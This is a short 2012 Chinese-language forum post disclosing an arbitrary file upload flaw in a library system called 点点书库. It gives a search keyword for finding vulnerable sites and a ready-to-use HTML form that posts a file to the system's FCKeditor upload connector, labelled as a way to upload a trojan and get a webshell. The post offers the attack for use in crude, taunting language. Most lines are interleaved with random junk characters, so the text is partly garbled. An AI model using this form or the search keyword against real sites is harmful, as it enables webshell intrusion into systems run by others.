主题:图书馆系统任意文件上传漏洞
- N7 ~! ]) w" t3 P: @+ }9 q 作者:冰锋刺客1 V& z% R* r; t6 M- m& [
厂商:点击书(dianjishu.com)# A3 f% [" p3 ~
日期:2012-6-21; H; c7 J: c5 m* O4 }. D
" O: o0 J) q6 }: EI 概述; Z% [" |: c; | l6 ?
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
* f' A& U& \& m II 简介! O! n! p+ d) p# s3 Y5 S2 S
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
Y# z. A5 p. L+ F' d8 { 补充一个漏洞
4 T4 l( t8 _; W' N. W1 ? <form id="frmUpload" enctype="multipart/form-data"# F- R6 M# h# x: `4 R3 B! E
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
$ h0 @5 Y# l" X4 q, L+ m <input id="btnUpload" type="submit" value="操翻他">
0 u' Q9 ?4 o& o, D( x( S </form>8 O5 R6 }/ M( w. I
你们懂的
% n4 W4 i- m: c4 m 那傻逼提供还需要改包.
5 o! \- e6 W' a1 L1 V 自己看了下源代码发现fckeditor, ? t$ H/ ]4 G: ?' c) M
直接秒杀
+ A' k2 e( e# w0 q% Z" |$ V% l |